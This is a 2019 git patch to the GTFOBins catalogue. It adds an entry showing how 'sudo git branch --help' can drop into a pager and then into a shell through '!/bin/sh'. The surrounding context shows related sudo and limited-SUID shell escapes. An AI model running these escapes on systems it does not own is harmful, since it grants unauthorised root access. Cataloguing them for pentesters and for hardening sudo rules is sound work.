From 09fdfe5f5dab7e9eb6380aa635ce6e06892417e1 Mon Sep 17 00:00:00 2001 From: Tobias <49147108+qtc-de@users.noreply.github.com> Date: Fri, 25 Oct 2019 14:19:18 +0200 Subject: [PATCH] Adding sub commands sudo for git --- _gtfobins/git.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/git.md b/_gtfobins/git.md index e9d0a92..646d289 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -12,6 +12,10 @@ functions: code: | sudo git -p help config !/bin/sh + - description: The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + sudo git branch --help config + !/bin/sh limited-suid: - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help ---